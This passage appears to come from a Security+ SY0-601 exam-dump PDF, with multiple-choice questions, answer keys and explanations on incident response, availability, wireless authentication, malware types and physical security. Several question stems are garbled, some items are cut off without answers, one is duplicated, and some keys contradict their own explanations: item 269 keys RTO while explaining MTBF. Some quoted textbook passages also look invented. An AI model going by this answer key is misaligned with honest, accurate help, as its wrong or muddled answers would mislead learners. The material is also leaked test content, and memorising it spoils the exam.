B. Disaster recovery plan
C. Business continuity plan
D. Risk plan
Answer: A
Explanation:
A communication plan is a plan that would fulfill the requirement of keeping stakeholders at an
organization aware of any incidents and receiving updates on status changes as they occur. A
communication plan is a document that outlines the communication objectives, strategies, methods,
channels, frequency, and audience for an incident response process. A communication plan can help an
organization communicate effectively and efficiently with internal and external stakeholders during an
incident and keep them informed of the incident’s impact, progress, resolution, and recovery.
References:
https://www.comptia.org/certifications/security#examdetails
https://www.comptia.org/content/guides/comptia-security-sy0-601-exam-objectives
https://www.ready.gov/business-continuity-plan
111 / 142
The safer , easier way to help you pass any IT exams.
268.Which of the following security design features can an development team to analyze the deletion
eoting Of data sets the copy?
A. Stored procedures
B. Code reuse
C. Version control
D. Continunus
Answer: C
Explanation:
Version control is a solution that can help a development team to analyze the deletion or editing of data
sets without affecting the original copy. Version control is a system that records changes to a file or set of
files over time so that specific versions can be recalled later. Version control can help developers track
and manage changes to code, data, or documents, as well as collaborate with other developers and
resolve conflicts.
References:
https://www.comptia.org/certifications/security#examdetails
https://www.comptia.org/content/guides/comptia-security-sy0-601-exam-objectives
https://www.atlassian.com/git/tutorials/what-is-version-control
269.Which of the following measures the average time that equipment will operate before it breaks?
A. SLE
B. MTBF
C. RTO
D. ARO
Answer: C
Explanation:
the measure that calculates the average time that equipment will operate before it breaks is MTBF12.
MTBF stands for Mean Time Between Failures and it is a metric that represents the average time
between two failures occurring in a given period12. MTBF is used to measure the reliability and
availability of a product or system12. The higher the MTBF, the more reliable and available the product or
system is12.
270.A network architect wants a server to have the ability to retain network availability even if one of the
network switches it is connected to goes down.
Which of the following should the architect implement on the server to achieve this goal?
A. RAID
B. UPS
C. NIC teaming
D. Load balancing
Answer: C
Explanation:
NIC Teaming is a feature that allows a server to be connected to multiple network switches, providing
redundancy and increased network availability. If one of the switches goes down, the server will still be
able to send and receive data through one of the other switches. To configure NIC Teaming in Windows
Server, see Microsoft's documentation: https://docs.microsoft.com/en-us/windows-
112 / 142
The safer , easier way to help you pass any IT exams.
271.A network administrator needs to determine Ihe sequence of a server farm's logs.
Which of the following should the administrator consider? (Select TWO).
A. Chain of custody
B. Tags
C. Reports
D. Time stamps
E. Hash values
F. Time offset
Answer: D,F
Explanation:
A server farm’s logs are records of events that occur on a group of servers that provide the same service
or function. Logs can contain information such as date, time, source, destination, message, error code,
and severity level. Logs can help administrators monitor the performance, security, and availability of the
servers and troubleshoot any issues.
To determine the sequence of a server farm’s logs, the administrator should consider the following
factors:
✑ Time stamps: Time stamps are indicators of when an event occurred on a server. Time stamps can
help administrators sort and correlate events across different servers based on chronological order.
However, time stamps alone may not be sufficient to determine the sequence of events if the servers
have different time zones or clock settings.
✑ Time offset: Time offset is the difference between the local time of a server and a reference time, such
as Coordinated Universal Time (UTC) or Greenwich Mean Time (GMT). Time offset can help
administrators adjust and synchronize the time stamps of different servers to a common reference time
and eliminate any discrepancies caused by time zones or clock settings.
References:
https://www.comptia.org/certifications/security#examdetails
https://www.comptia.org/content/guides/comptia-security-sy0-601-exam-objectives
https://docs.microsoft.com/en-us/windows-server/administration/server-manager/view-event-logs
272.A company recently enhanced mobile device configuration by implementing a set of security
controls: biometrics, context-aware authentication, and full device encryption. Even with these settings in
place, an unattended phone was used by a malicious actor to access corporate data.
Which of the following additional controls should be put in place first?
A. GPS tagging
B. Remote wipe
C. Screen lock timer
D. SEAndroid
Answer: C
Explanation:
According to NIST Special Publication 1800-4B1, some of the security controls that can be used to
protect mobile devices include:
113 / 142
The safer , easier way to help you pass any IT exams.
✑ Root and jailbreak detection: ensures that the security architecture for a mobile device has not been
compromised.
✑ Encryption: protects the data stored on the device and in transit from unauthorized access.
✑ Authentication: verifies the identity of the user and the device before granting access to enterprise
resources.
✑ Remote wipe: allows the organization to erase the data on the device in case of loss or theft.
✑ Screen lock timer: sets a time limit for the device to lock itself after a period of inactivity.
273.An employee's laptop was stolen last month. This morning, the was returned by the A cyberrsecurity
analyst retrieved laptop and has since cybersecurity incident checklist Four incident handlers are
responsible for executing the checklist.
Which of the following best describes the process for evidence collection assurance?
A. Time stamp
B. Chain of custody
C. Admissibility
D. Legal hold
Answer: B
Explanation:
Chain of custody is a process that documents the chronological and logical sequence of custody, control,
transfer, analysis, and disposition of materials, including physical or electronic evidence. Chain of
custody is important to ensure the integrity and admissibility of evidence in legal proceedings. Chain of
custody can help evidence collection assurance by providing proof that the evidence has been handled
properly and has not been tampered with or contaminated.
References:
https://www.comptia.org/certifications/security#examdetails
https://www.comptia.org/content/guides/comptia-security-sy0-601-exam-objectives
https://www.thoughtco.com/chain-of-custody-4589132
274.A security analyst receives an alert that indicates a user's device is displaying anomalous behavior.
The analyst suspects the device might be compromised.
Which of the following should the analyst to first?
A. Reboot the device
B. Set the host-based firewall to deny an incoming connection
C. Update the antivirus definitions on the device
D. Isolate the device
Answer: D
Explanation:
Isolating the device is the first thing that a security analyst should do if they suspect that a user’s device
might be compromised. Isolating the device means disconnecting it from the network or placing it in a
separate network segment to prevent further communication with potential attackers or malicious hosts.
Isolating the device can help contain the incident, limit the damage or data loss, preserve the evidence,
and facilitate the investigation and remediation.
References:
https://www.comptia.org/certifications/security#examdetails
114 / 142
The safer , easier way to help you pass any IT exams.
https://www.comptia.org/content/guides/comptia-security-sy0-601-exam-objectives
https://resources.infosecinstitute.com/topic/incident-response-process/
275.CORRECT TEXT
A new security engineer has started hardening systems. One of the hardening techniques the engineer
is using involves disabling remote logins to the NAS. Users are now reporting the inability to use SCP to
transfer files to the NAS, even though the data is still viewable from the users' PCs.
Which of the following is the MOST likely cause of this issue?
A TFTP was disabled on the local hosts
B. SSH was turned off instead of modifying the configuration file
C. Remote login was disabled in the networkd.conf instead of using the sshd.conf.
D. Network services are no longer running on the NAS.
Answer: B
Explanation:
Disabling remote logins to the NAS likely involved turning off SSH instead of modifying the configuration
file. This would prevent users from using SCP to transfer files to the NAS, even though the data is still
viewable from the users' PCs. Source: TechTarget
276.A network administrator needs to determine the sequence of a server farm's logs.
Which of the following should the administrator consider? (Select two).
A. Chain of custody
B. Tags
C. Reports
D. Time stamps
E. Hash values
F. Time offset
Answer: D,F
Explanation:
A server farm’s logs are records of events that occur on a group of servers that provide the same service
or function. Logs can contain information such as date, time, source, destination, message, error code,
and severity level. Logs can help administrators monitor the performance, security, and availability of the
servers and troubleshoot any issues.
To determine the sequence of a server farm’s logs, the administrator should consider the following
factors:
✑ Time stamps: Time stamps are indicators of when an event occurred on a server. Time stamps can
help administrators sort and correlate events across different servers based on chronological order.
However, time stamps alone may not be sufficient to determine the sequence of events if the servers
have different time zones or clock settings.
✑ Time offset: Time offset is the difference between the local time of a server and a reference time, such
as Coordinated Universal Time (UTC) or Greenwich Mean Time (GMT). Time offset can help
administrators adjust and synchronize the time stamps of different servers to a common reference time
and eliminate any discrepancies caused by time zones or clock settings.
References:
https://www.comptia.org/certifications/security#examdetails
115 / 142
The safer , easier way to help you pass any IT exams.
https://www.comptia.org/content/guides/comptia-security-sy0-601-exam-objectives
https://docs.microsoft.com/en-us/windows-server/administration/server-manager/view-event-logs
277.Which of the following describes where an attacker can purchase DDoS or ransomware services?
A. Threat intelligence
B. Open-source intelligence
C. Vulnerability database
D. Dark web
Answer: D
Explanation:
The best option to describe where an attacker can purchase DDoS or ransomware services is the dark
web. The dark web is an anonymous, untraceable part of the internet where a variety of illicit activities
take place, including the purchase of DDoS and ransomware services. According to the CompTIA
Security+ SY0-601 Official Text Book, attackers can purchase these services anonymously and without
the risk of detection or attribution. Additionally, the text book recommends that organizations monitor the
dark web to detect any possible threats or malicious activity.
278.A company is concerned about individuals driving a car into the building to gain access.
Which of the following security controls would work BEST to prevent this from happening?
A. Bollard
B. Camera
C. Alarms
D. Signage
E. Access control vestibule
Answer: A
Explanation:
Bollards are posts designed to prevent vehicles from entering an area. They are usually made of steel or
concrete and are placed close together to make it difficult for vehicles to pass through. In addition to
preventing vehicles from entering an area, bollards can also be used to protect buildings and pedestrians
from ramming attacks. They are an effective and cost-efficient way to protect buildings and pedestrians
from unauthorized access.
279.CORRECT TEXT
A company recently added a DR site and is redesigning the network. Users at the DR site are having
issues browsing websites.
INSTRUCTIONS
Click on each firewall to do the following:
1. Deny cleartext web traffic
2. Ensure secure management protocols are used.
3. Resolve issues at the DR site.
The ruleset order cannot be modified due to outside constraints.
Hat any time you would like to bring back the initial state of the simulation, please dick the Reset All
button.
116 / 142
The safer , easier way to help you pass any IT exams.
117 / 142
The safer , easier way to help you pass any IT exams.
Answer:
In Firewall 1, HTTP inbound Action should be DENY. As shown below
118 / 142
The safer , easier way to help you pass any IT exams.
119 / 142
The safer , easier way to help you pass any IT exams.
280.A security team discovered a large number of company-issued devices with non-work-related
software installed.
Which of the following policies would most likely contain language that would prohibit this activity?
A. NDA
B. BPA
C. AUP
D. SLA
Answer: C
Explanation:
AUP stands for acceptable use policy, which is a document that defines the rules and guidelines for
using an organization’s network, systems, devices, and resources. An AUP typically covers topics such
as authorized and unauthorized activities, security requirements, data protection, user responsibilities,
and consequences for violations. An AUP can help prevent non-work-related software installation on
company-issued devices by clearly stating what types of software are allowed or prohibited, and what
actions will be taken if users do not comply with the policy.
References:
https://www.comptia.org/certifications/security#examdetails
https://www.comptia.org/content/guides/comptia-security-sy0-601-exam-objectives
https://www.techopedia.com/definition/2471/acceptable-use-policy-aup
281.A company recently implemented a patch management policy; however, vulnerability scanners have
still been flagging several hosts, even after the completion of the patch process.
Which of the following is the most likely cause of the issue?
A. The vendor firmware lacks support.
B. Zero-day vulnerabilities are being discovered.
C. Third-party applications are not being patched.
120 / 142
The safer , easier way to help you pass any IT exams.
282.A user is trying to upload a tax document, which the corporate finance department requested, but a
security program IS prohibiting the upload A security analyst determines the file contains Pll,.
Which of the following steps can the analyst take to correct this issue?
A. Create a URL filter with an exception for the destination website.
B. Add a firewall rule to the outbound proxy to allow file uploads
C. Issue a new device certificate to the user's workstation.
D. Modify the exception list on the DLP to allow the upload
Answer: D
Explanation:
Data Loss Prevention (DLP) policies are used to identify and protect sensitive data, and often include a
list of exceptions that allow certain types of data to be uploaded or shared. By modifying the exception
list on the DLP, the security analyst can allow the tax document to be uploaded without compromising the
security of the system. (Reference: CompTIA Security+ SY0-601 Official Textbook, page 479-480)
283.A security administrator suspects there may be unnecessary services running on a server.
Which of the following tools will the administrator most likely use to confirm the suspicions?
A. Nmap
B. Wireshark
C. Autopsy
D. DNSEnum
Answer: A
Explanation:
Nmap is a tool that is used to scan IP addresses and ports in a network and to detect installed
applications. Nmap can help a security administrator determine the services running on a server by
sending various packets to the target and analyzing the responses. Nmap can also perform various
tasks such as OS detection, version detection, script scanning, firewall evasion, and vulnerability
scanning.
References:
https://www.comptia.org/certifications/security#examdetails
121 / 142
The safer , easier way to help you pass any IT exams.
https://www.comptia.org/content/guides/comptia-security-sy0-601-exam-objectives https://nmap.org/
284.A security analyst is reviewing computer logs because a host was compromised by malware After
the computer was infected it displayed an error screen and shut down.
Which of the following should the analyst review first to determine more information?
A. Dump file
B. System log
C. Web application log
D. Security too
Answer: A
Explanation:
A dump file is the first thing that a security analyst should review to determine more information about a
compromised device that displayed an error screen and shut down. A dump file is a file that contains a
snapshot of the memory contents of a device at the time of a system crash or error. A dump file can help
a security analyst analyze the cause and source of the crash or error, as well as identify any malicious
code or activity that may have triggered it.
References:
https://www.comptia.org/certifications/security#examdetails
https://www.comptia.org/content/guides/comptia-security-sy0-601-exam-objectives
https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/introduction-to-crash-dump-files
286.An employee used a corporate mobile device during a vacation Multiple contacts were modified in
the device vacation.
Which of the following method did attacker to insert the contacts without having 'Physical access to
device?
A. Jamming
B. BluJacking
C. Disassoaatm
D. Evil twin
Answer: B
Explanation:
122 / 142
The safer , easier way to help you pass any IT exams.
bluejacking is the sending of unsolicited messages over Bluetooth to Bluetooth-enabled devices such as
mobile phones, PDAs or laptop computers. Bluejacking does not involve device hijacking, despite what
the name implies. In this context, a human might say that the best answer to the question is B.
BluJacking, because it is a method that can insert contacts without having physical access to the device.
287.Which of the following secure application development concepts aims to block verbose error
messages from being shown in a user’s interface?
A. OWASP
B. Obfuscation/camouflage
C. Test environment
D. Prevent of information exposure
Answer: D
Explanation:
Preventing information exposure is a secure application development concept that aims to block verbose
error messages from being shown in a user’s interface. Verbose error messages are detailed messages
that provide information about errors or exceptions that occur in an application. Verbose error messages
may reveal sensitive information about the application’s structure, configuration, logic, or data that could
be exploited by attackers. Therefore, preventing information exposure involves implementing proper
error handling mechanisms that display generic or user-friendly messages instead of verbose error
messages.
References:
https://www.comptia.org/certifications/security#examdetails
https://www.comptia.org/content/guides/comptia-security-sy0-601-exam-objectives
https://owasp.org/www-project-top-ten/2017/A6_2017-Security_Misconfiguration
288.An email security vendor recently added a retroactive alert after discovering a phishing email had
already been delivered to an inbox.
Which of the following would be the best way for the security administrator to address this type of alert in
the future?
A. Utilize a SOAR playbook to remove the phishing message.
B. Manually remove the phishing emails when alerts arrive.
C. Delay all emails until the retroactive alerts are received.
D. Ingest the alerts into a SIEM to correlate with delivered messages.
Answer: A
Explanation:
One possible way to address this type of alert in the future is to use a SOAR (Security Orchestration,
Automation, and Response) playbook to automatically remove the phishing message from the inbox3. A
SOAR playbook is a set of predefined actions that can be triggered by certain events or conditions. This
can help reduce the response time and human error in dealing with phishing alerts.
289.A security administrator Is managing administrative access to sensitive systems with the following
requirements:
• Common login accounts must not be used (or administrative duties.
• Administrative accounts must be temporal in nature.
123 / 142
The safer , easier way to help you pass any IT exams.
290.A global pandemic is forcing a private organization to close some business units and reduce staffing
at others.
Which of the following would be best to help the organization's executives determine their next course of
action?
A. An incident response plan
B. A communication plan
C. A disaster recovery plan
D. A business continuity plan
Answer: D
Explanation:
A business continuity plan (BCP) is a document that outlines how an organization will continue its critical
functions during and after a disruptive event, such as a natural disaster, pandemic, cyberattack, or power
outage. A BCP typically covers topics such as business impact analysis, risk assessment, recovery
strategies, roles and responsibilities, communication plan, testing and training, and maintenance and
review. A BCP can help the organization’s executives determine their next course of action by providing
them with a clear framework and guidance for managing the crisis and resuming normal operations.
References:
https://www.comptia.org/certifications/security#examdetails
https://www.comptia.org/content/guides/comptia-security-sy0-601-exam-objectives
https://www.ready.gov/business-continuity-plan
291.A security administrator needs to block a TCP connection using the corporate firewall, Because this
connection is potentially a threat. the administrator not want to back an RST.
Which of the following actions in rule would work best?
A. Drop
B. Reject
C. Log alert
D. Permit
124 / 142
The safer , easier way to help you pass any IT exams.
Answer: A
Explanation:
the difference between drop and reject in firewall is that the drop target sends nothing to the source,
while the reject target sends a reject response to the source. This can affect how the source handles the
connection attempt and how fast the port scanning is. In this context, a human might say that the best
action to block a TCP connection using the corporate firewall is A. Drop, because it does not send back
an RST packet and it may slow down the port scanning and protect against DoS attacks.
292.Which of the following would a security analyst use to determine if other companies in the same
sector have seen similar malicious activity against their systems?
A. Vulnerability scanner
B. Open-source intelligence
C. Packet capture
D. Threat feeds
Answer: D
Explanation:
Threat feeds, also known as threat intelligence feeds, are a source of information about current and
emerging threats, vulnerabilities, and malicious activities targeting organizations. Security analysts use
threat feeds to gather information about attacks and threats targeting their industry or sector. These
feeds are typically provided by security companies, research organizations, or industry-specific groups.
By using threat feeds, analysts can identify trends, patterns, and potential threats that may target their
own organization, allowing them to take proactive steps to protect their systems.
References:
1. CompTIA Security+ Certification Exam Objectives (SY0-601):
https://www.comptia.jp/pdf/Security%2B%20SY0-601%20Exam%20Objectives.pdf
2. SANS Institute: Threat Intelligence: What It Is, and How to Use It Effectively:
https://www.sans.org-room/whitepapers/analyst/threat-intelligence-is-effectively-36367
293.An upcoming project focuses on secure communications and trust between external parties.
Which of the following security components will need to be considered to ensure a chosen trust provider
IS used and the selected option is highly scalable?
A. Self-signed certificate
B. Certificate attributes
C. Public key Infrastructure
D. Domain validation
Answer: C
Explanation:
PKI is a security technology that enables secure communication between two parties by using
cryptographic functions. It consists of a set of components that are used to create, manage, distribute,
store, and revoke digital certificates. PKI provides a secure way to exchange data between two parties,
as well as a trust provider to ensure that the data is not tampered with. It also helps to create a highly
scalable solution, as the same certificate can be used for multiple parties.
According to the CompTIA Security+ Study Guide, “PKI is a technology used to secure communications
between two external parties. PKI is based on the concept of digital certificates, which are used to
125 / 142
The safer , easier way to help you pass any IT exams.
authenticate the sender and recipient of a message. PKI provides a trust provider to ensure that the
digital certificate is valid and has not been tampered with. It also provides a scalable solution, as multiple
parties can use the same certificate.”
294.A security investigation revealed mat malicious software was installed on a server using a server
administrator credentials. During the investigation the server administrator explained that Telnet was
regularly used to log in.
Which of the blowing most likely occurred?
A. A spraying attack was used to determine which credentials to use
B. A packet capture tool was used to steal the password
C. A remote-access Trojan was used to install the malware
D. A directory attack was used to log in as the server administrator
Answer: B
Explanation:
Telnet is an insecure protocol that transmits data in cleartext over the network. This means that anyone
who can intercept the network traffic can read the data, including the username and password of the
server administrator. A packet capture tool is a software or hardware device that can capture and
analyze network packets. An attacker can use a packet capture tool to steal the password and use it to
install malicious software on the server.
References: https://www.comptia.org/content/guides/what-is-network-security
295.A company would like to move to the cloud. The company wants to prioritize control and security
over cost and ease of management.
Which of the following cloud models would best suit this company's priorities?
A. Public
B. Hybrid
C. Community
D. Private
Answer: D
Explanation:
A private cloud model would best suit the company's priorities of control and security over cost and ease
of management. In a private cloud, the infrastructure is dedicated to a single organization, providing
greater control over the environment and the ability to implement strict security measures. This is in
contrast to public, community, or hybrid cloud models, where resources are shared among multiple
organizations, potentially compromising control and security. While private clouds can be more
expensive and more difficult to manage, they the highest level of control and security for the company.
Reference:
- CompTIA Security+ Certification Exam Objectives (SY0-601), Section 3.2: "Explain the importance of
secure staging deployment concepts."
- Cisco: Private Cloud - https://www.cisco.com/c/en/us/solutions/cloud/private-cloud.html
296.Which of the following is a security implication of newer 1CS devices that are becoming more
common in corporations?
A. Devices with celular communication capabilities bypass traditional network security controls
126 / 142
The safer , easier way to help you pass any IT exams.
B. Many devices do not support elliptic-curve encryption algorithms due to the overhead they require.
C. These devices often lade privacy controls and do not meet newer compliance regulations
D. Unauthorized voice and audio recording can cause loss of intellectual property
Answer: D
Explanation:
Industrial control systems (ICS) are devices that monitor and control physical processes, such as power
generation, manufacturing, or transportation. Newer ICS devices may have voice and audio capabilities
that can be exploited by attackers to eavesdrop on sensitive conversations or capture confidential
information. This can result in the loss of intellectual property or trade secrets.
References: https://www.comptia.org/content/guides/what-is-industrial-control-system-security
297.A small, local company experienced a ransomware attack. The company has one web-facing server
and a few workstations. Everything is behind an ISP firewall. A single web-facing server is set up on the
router to forward all ports so that the server is viewable from the internet. The company uses an older
version of third-party software to manage the website. The assets were never patched.
Which of the following should be done to prevent an attack like this from happening again? (Select
three).
A. Install DLP software to prevent data loss.
B. Use the latest version of software.
C. Install a SIEM device.
D. Implement MDM.
E. Implement a screened subnet for the web server.
F. Install an endpoint security solution.
G. Update the website certificate and revoke the existing ones.
H. Deploy additional network sensors.
Answer: B,E,F
298.A desktop computer was recently stolen from a desk located in the lobby of an office building.
Which of the following would be the best way to secure a replacement computer and deter future theft?
A. Installing proximity card readers on all entryway doors
B. Deploying motion sensor cameras in the lobby
C. Encrypting the hard drive on the new desktop
D. Using cable locks on the hardware
Answer: D
Explanation:
Using cable locks on the hardware can be an effective way to secure a desktop computer and deter
future theft. Cable locks are physical security devices that attach to the computer case and to a nearby
stationary object, such as a desk or wall. This makes it more difficult for a thief to remove the computer
without damaging it or attracting attention.
Installing proximity card readers on all entryway doors can enhance physical security by limiting access
to authorized individuals. Deploying motion sensor cameras in the lobby can also help deter theft by
capturing images of any unauthorized individuals entering the premises or attempting to steal the
computer. Encrypting the hard drive on the replacement desktop can also help protect sensitive data in
the event of theft, but it does not provide physical security for the device itself.
127 / 142
The safer , easier way to help you pass any IT exams.
299.A security administrator is integrating several segments onto a single network. One of the segments,
which includes legacy devices, presents a significant amount of risk to the network.
Which of the following would allow users to access to the legacy devices without compromising the
security of the entire network?
A. NIDS
B. MAC filtering
C. Jump server
D. IPSec
E. NAT gateway
Answer: C
Explanation:
A jump server is a device that acts as an intermediary between users and other devices on a network. A
jump server can provide a secure and controlled access point to the legacy devices without exposing
them directly to the network. A jump server can also enforce authentication, authorization, logging, and
auditing policies.
300.The management team has requested that the security team implement 802.1X into the existing
wireless network setup.
The following requirements must be met:
• Minimal interruption to the end user
• Mutual certificate validation
Which of the following authentication protocols would meet these requirements?
A. EAP-FAST
B. PSK
C. EAP-TTLS
D. EAP-TLS
Answer: D
Explanation:
EAP-TLS (Extensible Authentication Protocol - Transport Layer Security) is an authentication protocol
that uses certificates to provide mutual authentication between the client and the authentication server. It
also allows for the encryption of user credentials, making EAP-TLS a secure and reliable authentication
protocol. According to the CompTIA Security+ SY0-601 Official Text Book, EAP-TLS is well-suited for
wireless networks due to its mutual authentication capabilities and its ability to securely store credentials.
It is also the preferred authentication protocol for 802.1X wireless networks.
301.A company owns a public-facing e-commerce website. The company outsources credit card
transactions to a payment company.
Which of the following BEST describes the role of the payment company?
A. Data controller
B. Data custodian
C. Data owners
D. Data processor
Answer: D
128 / 142
The safer , easier way to help you pass any IT exams.
Explanation:
A data processor is an organization that processes personal data on behalf of a data controller. In this
scenario, the company that owns the e-commerce website is the data controller, as it determines the
purposes and means of processing personal data (e.g. credit card information). The payment company is
a data processor, as it processes personal data on behalf of the e-commerce company (i.e. it processes
credit card transactions).
Reference: CompTIA Security+ Study Guide (SY0-601) 7th Edition by Emmett Dulaney, Chuck Easttom
303.Which of the following is a solution that can be used to stop a disgruntled employee from copying
confidential data to a USB drive?
A. DLP
B. TLS
C. AV
D. IDS
Answer: A
Explanation:
DLP stands for data loss prevention, which is a set of tools and processes that aim to prevent
unauthorized access, use, or transfer of sensitive data. DLP can help mitigate the risk of data exfiltration
by disgruntled employees or external attackers by monitoring and controlling data flows across
endpoints, networks, and cloud services. DLP can also detect and block attempts to copy, transfer, or
upload sensitive data to a USB drive or other removable media based on predefined policies and rules.
References:
https://www.comptia.org/certifications/security#examdetails
https://www.comptia.org/content/guides/comptia-security-sy0-601-exam-objectives
https://www.microsoft.com/en-us/security/business/security-101/what-is-data-loss-prevention-dlp
129 / 142
The safer , easier way to help you pass any IT exams.
Which of the following types of malware MOST likely contains this snippet?
A. Logic bomb
B. Keylogger
C. Backdoor
D. Ransomware
Answer: A
Explanation:
A logic bomb is a type of malware that executes malicious code when certain conditions are met. A logic
bomb can be triggered by various events, such as a specific date or time, a user action, a system
configuration change, or a command from an attacker. A logic bomb can perform various malicious
actions, such as deleting files, encrypting data, displaying messages, or launching other malware.
The snippet of Python code shows a logic bomb that executes a function called delete_all_files() when
the current date is December 25th. The code uses the datetime module to get the current date and
compare it with a predefined date object. If the condition is true, the code calls the delete_all_files()
function, which presumably deletes all files on the system.
References:
https://www.comptia.org/certifications/security#examdetails
https://www.comptia.org/content/guides/comptia-security-sy0-601-exam-objectives
https://www.kaspersky.com/resource-center/definitions/logic-bomb
305.A large bank with two geographically dispersed data centers Is concerned about major power
disruptions at Both locations. Every day each location experiences very brief outages thai last (or a few
seconds. However, during the summer a high risk of intentional under-voltage events that could last up
to an hour exists, particularly at one of the locations near an industrial smelter.
Which of the following is the BEST solution to reduce the risk of data loss?
A. Dual supply
B. Generator
C. PDU
D. Dally backups
Answer: B
Explanation:
A generator will provide uninterrupted power to the data centers, ensuring that they are not affected by
any power disruptions, intentional or otherwise. This is more reliable than a dual supply or a PDU, and
more effective than daily backups, which would not be able to protect against an outage lasting an hour.
306.A user's laptop constantly disconnects from the Wi-Fi network. Once the laptop reconnects, the user
can reach the internet but cannot access shared folders or other network resources.
Which of the following types of attacks is the user MOST likely experiencing?
A. Bluejacking
130 / 142
The safer , easier way to help you pass any IT exams.
B. Jamming
C. Rogue access point
D. Evil twin
Answer: D
Explanation:
An evil twin attack is when an attacker sets up a fake Wi-Fi network that looks like a legitimate network,
but is designed to capture user data that is sent over the network. In this case, the user's laptop is
constantly disconnecting and reconnecting to the Wi-Fi network, indicating that it is connecting to the
fake network instead of the legitimate one. Once the user connects to the fake network, they are unable
to access shared folders or other network resources, as those are only available on the legitimate
network.
307.A data cento has experienced an increase in under-voltage events Mowing electrical grid
maintenance outside the facility These events are leading to occasional losses of system availability.
Which of the following would be the most cost-effective solution for the data center 10 implement''
A. Uninterruptible power supplies with battery backup
B. Managed power distribution units lo track these events
C. A generator to ensure consistent, normalized power delivery
D. Dual power supplies to distribute the load more evenly
Answer: A
Explanation:
Uninterruptible power supplies with battery backup would be the most cost-effective solution for the data
center to implement to prevent under-voltage events following electrical grid maintenance outside the
facility. An uninterruptible power supply (UPS) is a device that provides emergency power to a load when
the main power source fails or drops below an acceptable level. A UPS with battery backup can help
prevent under-voltage events by switching to battery power when it detects a voltage drop or outage in
the main power source. A UPS with battery backup can also protect the data center equipment from
power surges or spikes.
References:
https://www.comptia.org/certifications/security#examdetails
https://www.comptia.org/content/guides/comptia-security-sy0-601-exam-objectives
https://www.apc.com/us/en/faqs/FA158852/
131 / 142
The safer , easier way to help you pass any IT exams.
309.A company a "right to forgotten" request To legally comply, the company must remove data related
to the requester from its systems.
Which Of the following Company most likely complying with?
A. NIST CSF
B. GDPR
C. PCI OSS
D. ISO 27001
Answer: B
Explanation:
GDPR stands for General Data Protection Regulation, which is a law that regulates data protection and
privacy in the European Union (EU) and the European Economic Area (EEA). GDPR also applies to the
transfer of personal data outside the EU and EEA areas. GDPR grants individuals the right to request the
deletion or removal of their personal data from an organization’s systems under certain circumstances.
This right is also known as the “right to be forgotten” or the “right to erasure”. An organization that
receives such a request must comply with it within a specified time frame, unless there are legitimate
grounds for retaining the data.
References:
https://www.comptia.org/certifications/security#examdetails
https://www.comptia.org/content/guides/comptia-security-sy0-601-exam-objectives
https://gdpr-info.eu/issues/right-to-be-forgotten/
310.CORRECT TEXT
A systems administrator needs to install a new wireless network for authenticated guest access. The
wireless network should support 802. IX using the most secure encryption and protocol available.
Perform the following steps:
1. Configure the RADIUS server.
2. Configure the WiFi controller.
3. Preconfigure the client for an incoming guest. The guest AD credentials are:
User: guest01
Password: guestpass
132 / 142
The safer , easier way to help you pass any IT exams.
Answer:
Wifi Controller
SSID: CORPGUEST
SHARED KEY: Secret
AAA server IP: 192.168.1.20
PSK: Blank
Authentication type: WPA2-EAP-PEAP-MSCHAPv2
Controller IP: 192.168.1.10
Radius Server
Shared Key: Secret
Client IP: 192.168.1.10
Authentication Type: Active Directory
Server IP: 192.168.1.20
Wireless Client
SSID: CORPGUEST
Username: guest01
Userpassword: guestpass
PSK: Blank
Authentication type: WPA2-Enterprise
311.A network-connected magnetic resonance imaging (MRI) scanner at a hospital is controlled and
operated by an outdated and unsupported specialized Windows OS.
Which of the following is most likely preventing the IT manager at the hospital from upgrading the
specialized OS?
A. The time needed for the MRI vendor to upgrade the system would negatively impact patients.
B. The MRI vendor does not support newer versions of the OS.
C. Changing the OS breaches a support SLA with the MRI vendor.
D. The IT team does not have the budget required to upgrade the MRI scanner.
Answer: B
133 / 142
The safer , easier way to help you pass any IT exams.
Explanation:
This option is the most likely reason for preventing the IT manager at the hospital from upgrading the
specialized OS. The MRI scanner is a complex and sensitive device that requires a specific OS to control
and operate it. The MRI vendor may not have developed or tested newer versions of the OS for
compatibility and functionality with the scanner. Upgrading the OS without the vendor’s support may
cause the scanner to malfunction or stop working altogether.
312.A security administrator performs weekly vulnerability scans on all cloud assets and provides a
detailed report.
Which of the following describes the administrator's activities?
A. Continuous deployment
B. Continuous integration
C. Continuous validation
D. Continuous monitoring
Answer: C
Explanation:
Continuous validation is a process that involves performing regular and automated tests to verify the
security and functionality of a system or an application. Continuous validation can help identify and
remediate vulnerabilities, bugs, or misconfigurations before they cause any damage or disruption. The
security administrator’s activities of performing weekly vulnerability scans on all cloud assets and
providing a detailed report are examples of continuous validation.
313.Which of the following social engineering attacks best describes an email that is primarily intended
to mislead recipients into forwarding the email to others?
A. Hoaxing
B. Pharming
C. Watering-hole
D. Phishing
Answer: A
Explanation:
Hoaxing is a type of social engineering attack that involves sending false or misleading information via
email or other means to trick recipients into believing something that is not true. Hoaxing emails often
contain a request or an incentive for the recipients to forward the email to others, such as a warning of a
virus, a promise of a reward, or a petition for a cause. The goal of hoaxing is to spread misinformation,
cause panic, waste resources, or damage reputations.
A hoaxing email is primarily intended to mislead recipients into forwarding the email to others, which can
increase the reach and impact of the hoax.
314.After installing a patch On a security appliance. an organization realized a massive data exfiltration
occurred.
Which Of the following describes the incident?
A. Supply chain attack
B. Ransomware attack
C. Cryptographic attack
134 / 142
The safer , easier way to help you pass any IT exams.
D. Password attack
Answer: A
Explanation:
A supply chain attack is a type of attack that involves compromising a trusted third-party provider or
vendor and using their products or services to deliver malware or gain access to the target organization.
The attacker can exploit the trust and dependency that the organization has on the provider or vendor
and bypass their security controls. In this case, the attacker may have tampered with the patch for the
security appliance and used it to exfiltrate data from the organization.
315.Which of the following Is the BEST reason to maintain a functional and effective asset management
policy that aids in ensuring the security of an organization?
A. To provide data to quantify risk based on the organization's systems
B. To keep all software and hardware fully patched for known vulnerabilities
C. To only allow approved, organization-owned devices onto the business network
D. To standardize by selecting one laptop model for all users in the organization
Answer: A
Explanation:
An effective asset management policy helps an organization understand and manage the systems,
hardware, and software it uses, and how they are used, including their vulnerabilities and risks. This
information is crucial for accurately identifying and assessing risks to the organization, and making
informed decisions about how to mitigate those risks. This is the best reason to maintain an effective
asset management policy.
Reference: CompTIA Security+ Study Guide (SY0-601) 7th Edition by Emmett Dulaney, Chuck Easttom
316.A company wants to enable BYOD for checking email and reviewing documents. Many of the
documents contain sensitive organizational information.
Which of the following should be deployed first before allowing the use of personal devices to access
company data?
A. MDM
B. RFID
C. DLR
D. SIEM
Answer: A
